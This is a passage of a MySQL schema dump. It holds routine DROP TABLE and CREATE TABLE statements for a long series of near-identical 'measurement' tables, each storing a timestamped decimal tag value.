/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement287`
--
DROP TABLE IF EXISTS `measurement287`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement287` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement288`
--
DROP TABLE IF EXISTS `measurement288`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement288` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement289`
--
DROP TABLE IF EXISTS `measurement289`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement289` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement29`
--
DROP TABLE IF EXISTS `measurement29`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement29` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement290`
--
DROP TABLE IF EXISTS `measurement290`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement290` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement291`
--
DROP TABLE IF EXISTS `measurement291`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement291` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement292`
--
DROP TABLE IF EXISTS `measurement292`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement292` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement293`
--
DROP TABLE IF EXISTS `measurement293`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement293` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement294`
--
DROP TABLE IF EXISTS `measurement294`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement294` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement295`
--
DROP TABLE IF EXISTS `measurement295`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement295` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement296`
--
DROP TABLE IF EXISTS `measurement296`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement296` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement297`
--
DROP TABLE IF EXISTS `measurement297`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement297` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement298`
--
DROP TABLE IF EXISTS `measurement298`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement298` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement299`
--
DROP TABLE IF EXISTS `measurement299`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement299` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement3`
--
DROP TABLE IF EXISTS `measurement3`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement3` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement30`
--
DROP TABLE IF EXISTS `measurement30`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement30` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement300`
--
DROP TABLE IF EXISTS `measurement300`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement300` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement301`
--
DROP TABLE IF EXISTS `measurement301`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement301` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement302`
--
DROP TABLE IF EXISTS `measurement302`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement302` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement303`
--
DROP TABLE IF EXISTS `measurement303`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement303` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement304`
--
DROP TABLE IF EXISTS `measurement304`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement304` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement305`
--
DROP TABLE IF EXISTS `measurement305`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement305` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement306`
--
DROP TABLE IF EXISTS `measurement306`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement306` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement307`
--
DROP TABLE IF EXISTS `measurement307`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement307` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement308`
--
DROP TABLE IF EXISTS `measurement308`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement308` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement309`
--
DROP TABLE IF EXISTS `measurement309`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement309` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement31`
--
DROP TABLE IF EXISTS `measurement31`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement31` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement310`
--
DROP TABLE IF EXISTS `measurement310`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement310` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement311`
--
DROP TABLE IF EXISTS `measurement311`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement311` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement312`
--
DROP TABLE IF EXISTS `measurement312`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement312` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement313`
--
DROP TABLE IF EXISTS `measurement313`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement313` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement314`
--
DROP TABLE IF EXISTS `measurement314`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement314` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement315`
--
DROP TABLE IF EXISTS `measurement315`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement315` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement316`
--
DROP TABLE IF EXISTS `measurement316`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement316` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement317`
--
DROP TABLE IF EXISTS `measurement317`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement317` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement318`
--
DROP TABLE IF EXISTS `measurement318`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement318` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement319`
--
DROP TABLE IF EXISTS `measurement319`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement319` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement32`
--
DROP TABLE IF EXISTS `measurement32`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement32` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement320`
--
DROP TABLE IF EXISTS `measurement320`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement320` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement321`
--
DROP TABLE IF EXISTS `measurement321`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement321` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement322`
--
DROP TABLE IF EXISTS `measurement322`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement322` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement323`
--
DROP TABLE IF EXISTS `measurement323`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement323` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement324`
--
DROP TABLE IF EXISTS `measurement324`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement324` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement325`
--
DROP TABLE IF EXISTS `measurement325`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement325` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement326`
--
DROP TABLE IF EXISTS `measurement326`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement326` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement327`
--
DROP TABLE IF EXISTS `measurement327`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement327` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement328`
--
DROP TABLE IF EXISTS `measurement328`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement328` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement329`
--
DROP TABLE IF EXISTS `measurement329`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement329` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement33`
--
DROP TABLE IF EXISTS `measurement33`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement33` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement330`
--
DROP TABLE IF EXISTS `measurement330`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement330` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement331`
--
DROP TABLE IF EXISTS `measurement331`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement331` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement332`
--
DROP TABLE IF EXISTS `measurement332`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement332` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement333`
--
DROP TABLE IF EXISTS `measurement333`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement333` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement334`
--
DROP TABLE IF EXISTS `measurement334`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement334` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement335`
--
DROP TABLE IF EXISTS `measurement335`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement335` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement336`
--
DROP TABLE IF EXISTS `measurement336`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement336` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement337`
--
DROP TABLE IF EXISTS `measurement337`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement337` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement338`
--
DROP TABLE IF EXISTS `measurement338`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement338` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement339`
--
DROP TABLE IF EXISTS `measurement339`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement339` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement34`
--
DROP TABLE IF EXISTS `measurement34`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement34` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement340`
--
DROP TABLE IF EXISTS `measurement340`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement340` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement341`
--
DROP TABLE IF EXISTS `measurement341`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement341` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement342`
--
DROP TABLE IF EXISTS `measurement342`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement342` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement343`
--
DROP TABLE IF EXISTS `measurement343`;
